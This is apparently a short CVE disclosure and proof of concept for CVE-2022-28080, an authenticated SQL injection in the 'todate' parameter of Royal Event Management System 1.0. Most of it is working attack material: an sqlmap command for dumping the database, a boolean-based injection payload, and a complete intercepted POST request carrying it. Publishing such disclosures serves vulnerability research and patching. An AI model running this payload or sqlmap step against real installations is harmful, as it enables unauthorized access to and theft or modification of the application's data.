Headline
CVE-2022-28080: GitHub - erengozaydin/Royal-Event-Management-System-todate-SQL-Injection-Authenticated: CVE-2022-28080
Royal Event Management System v1.0 was discovered to contain a SQL injection vulnerability via the todate parameter.
Royal Event Management System - ‘todate’ SQL Injection (Authenticated)
- Description:
Royal Event Management System 1.0 allows SQL Injection via parameter ‘todate’ in /royal_event/btndates_report.php#?= Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
- Proof of Concept:
In Burpsuite intercept the request from the affected page with ‘todate’ parameter and save it like poc.txt. Then run SQLmap to extract the data from the database:
sqlmap -r poc.txt --dbms=mysql
- Example payload:
(boolean-based)
-1%27+OR+1%3d1+OR+%27ns%27%3d%27ns
- Burpsuite request:
POST /royal_event/btndates_report.php#?= HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 334
Content-Type: multipart/form-data; boundary=f289a6438bcc45179bcd3eb7ddc555d0
Cookie: PHPSESSID=qeoe141g7guakhacf152a3i380
Referer: http://localhost/royal_event/btndates_report.php#?=
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
–f289a6438bcc45179bcd3eb7ddc555d0
Content-Disposition: form-data; name="todate"
-1’ OR 1=1 OR 'ns’=’ns
–f289a6438bcc45179bcd3eb7ddc555d0
Content-Disposition: form-data; name="search"
3 --f289a6438bcc45179bcd3eb7ddc555d0
Content-Disposition: form-data; name="fromdate"
01/01/2011
–f289a6438bcc45179bcd3eb7ddc555d0–